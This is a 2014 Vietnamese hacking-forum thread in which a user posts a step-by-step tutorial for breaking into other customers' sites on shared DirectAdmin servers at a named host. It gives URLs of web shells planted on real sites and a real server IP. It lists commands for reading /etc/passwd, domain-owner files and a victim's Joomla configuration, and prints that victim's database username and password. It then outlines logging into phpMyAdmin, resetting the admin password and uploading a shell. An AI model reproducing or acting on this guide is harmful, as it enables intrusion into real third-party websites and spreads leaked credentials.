Bang hộiTiền mặt: 0 Xu Trò chơiHộp quà giáng sinhThứ Bảy, 00:03:38 - 23/11/2024
Chia sẻ kiến thức trên các lĩnh vực khác

Các điều hành viên: Mod, SMod, Admin

[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

#1 » Gửi bài gửi bởi Ghost » 02/03/2014 21:25 » @301520

Trước tiên là cần shell :
http://hyundaicounty.com/images/vic.php< victoria
Không cần để ý tới hàm nó disable bao nhiêu, nhìn vào cái server là được ( dựa theo kinh nghiệm local )
vào check-host.net > check hyundaicounty.com > info
Sẽ ra : Host name ln03.bsg.vn < nó chạy sv bsg
BSG quẩy tốt, sv chạy direct thì chắc chỉ ngại bkns và powernet ( powernet bởi vì ngày trước mình có contact lỗi này cho bên đấy nên nó fix hết quá nhọ
Bây giờ check quyền Server: - id: () - uid= () gid=603() < đủ quyền
Safe_mode : On < không có quyền thực thi lệnh, nhưng không sao bởi vì đối với những sv chạy direct ta chỉ cần hạ quyền xuống apache, chứ đừng thằng nào dại mà symlink sv chạy direct nhé
Khi đổi sang chạy shell = ip/~user thì nó sẽ tự hạ quyền xuống apache, nhưng chắc chắn sẽ không chạy được shell php hoặc perl, nhưng không sao shtml, html vẫn chạy tốt
Giờ ta up 1 con shell shtml lên, và quẩy thôi
http://123.30.181.39/~otohncom/images/ssi.shtml ?
Kiểm tra quyền : id
Sẽ được : uid=101(apache)gid=501(apache)groups=501(apache),503(access)
Quyền đã được hạ, bây giờ ta dùng dir or cat
dir : lệnh xem thư mục trong linux
cat : lệnh xem file trong linux
Xác định victim thực thi lệnh : cat/etc/passwd hoặc cat/etc/virtual/domainowners < đối với server chạy DA
Ví dụ victim : gvth.net user là : vannhan
ta sử dụng : dir -ao/home/vannhan/domains/gvth.net/public_html < để xem thư mục public_html của victim
Tiếp theo tìm config < chưa user pass database của victim
Victim chạy joomla > config sẽ là > configuration.php
Ta sử dụng : cat/home/vannhan/domains/gvth.net/public_html/configuration.php để view source của file configuration.php
Sẽ ra db là :
var $user = 'vannhan_vannhan';
var $db = 'vannhan_dulieu';
var $password = 'WQUnkOZe';
Bước tiếp theo là connect tới mysql bằng http://123.30.181.39/phpmyadmin< chỉ đối với sv chạy DA mới có nhé
Change pass joomla bằng md5 > login vào admin của victim và upload shell
End Tut
Sửa lần cuối: Ghost 02/03/2014 21:27

Đặng Lê Minh Nguyên


FACEBOOK

Những người đã like Ghost bởi bài viết có ích này:
S2diamon
Ghost
Hình đại diện của thành viên
Rank: ☀️11/30☀️
Cấp độ:
Tu luyện:
Like:
Online:
Bang hội: Ghost Team
Xếp hạng Bang hội: ⚡11/7⚡
Level:
Chủ đề đã tạo: 🩸271/4141🩸
Tiền mặt:
Ngân hàng:
Nhóm:
Danh hiệu: ⚝Phổ Độ Chúng Sinh⚝
Giới tính:
Ngày tham gia:
Đến từ:
Số điện thoại:
(Nokia 2730c-1)

Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

#2 » Gửi bài gửi bởi Ghost » 02/03/2014 21:28 » @301523

Thêm tí cho newbie nếu muốn biết sv có chạy DA thì thử xem nó có open port 2222 ko

http://123.30.181.39:2222/

Đặng Lê Minh Nguyên


FACEBOOK
Ghost
Hình đại diện của thành viên
Rank: ☀️11/30☀️
Cấp độ:
Tu luyện:
Like:
Online:
Bang hội: Ghost Team
Xếp hạng Bang hội: ⚡11/7⚡
Level:
Chủ đề đã tạo: 🩸271/4141🩸
Tiền mặt:
Ngân hàng:
Nhóm:
Danh hiệu: ⚝Phổ Độ Chúng Sinh⚝
Giới tính:
Ngày tham gia:
Đến từ:
Số điện thoại:
(Nokia 2730c-1)

Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

#3 » Gửi bài gửi bởi Ghost » 02/03/2014 21:53 » @301551

Up top..chẳng ai quan tâm..mất công viết bài

Đặng Lê Minh Nguyên


FACEBOOK
Ghost
Hình đại diện của thành viên
Rank: ☀️11/30☀️
Cấp độ:
Tu luyện:
Like:
Online:
Bang hội: Ghost Team
Xếp hạng Bang hội: ⚡11/7⚡
Level:
Chủ đề đã tạo: 🩸271/4141🩸
Tiền mặt:
Ngân hàng:
Nhóm:
Danh hiệu: ⚝Phổ Độ Chúng Sinh⚝
Giới tính:
Ngày tham gia:
Đến từ:
Số điện thoại:
(Nokia 2730c-1)



Quay về Kiến thức khác

 


  • Chủ đề tương tự
    Trả lời
    Xem
    Bài viết mới nhất